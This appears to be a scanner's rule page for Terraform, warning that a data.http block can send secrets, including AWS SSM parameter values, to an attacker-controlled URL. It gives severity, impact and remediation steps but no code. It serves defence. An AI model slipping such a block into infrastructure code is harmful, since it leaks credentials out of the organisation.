HTTP data block can be used to leak secrets or variables outside of the organization

Severity	Exploitability	Providers	Categories
CRITICAL	HIGH	AWS	SECRET

Description

The data.http block can be used to leak any value/data from the configuration to any external URL.

In particular, values generated via the aws_ssm_parameter resource can be leaked inside the URL during the http.data query.

This is a critical vulnerability when secure credentials are leaked that way.

Once the vulnerability is in place, with an URL controlled by the attacker, no privileges are required to exploit it. Leaks will continue until remediation.

Impact

Potential data exposure	Visible in logs	User interaction required	Privileges required
True	True	False	False

Once credentials have been exposed, an attacker can get persistent access to the exposed resources, and the organisation.

Remediation guidelines

• Revoke all potentially exposed credentials.
• Remove the data.http block if possible.
• If this configuration comes from a third party module, immediately find a "Verified" alternative.

References

• Proof of exploit: Supply Chain Attack as Code
• Terraform: AWS ssm_parameter resource documentation
• Terraform: Sensitive Data in State

Was this page helpful?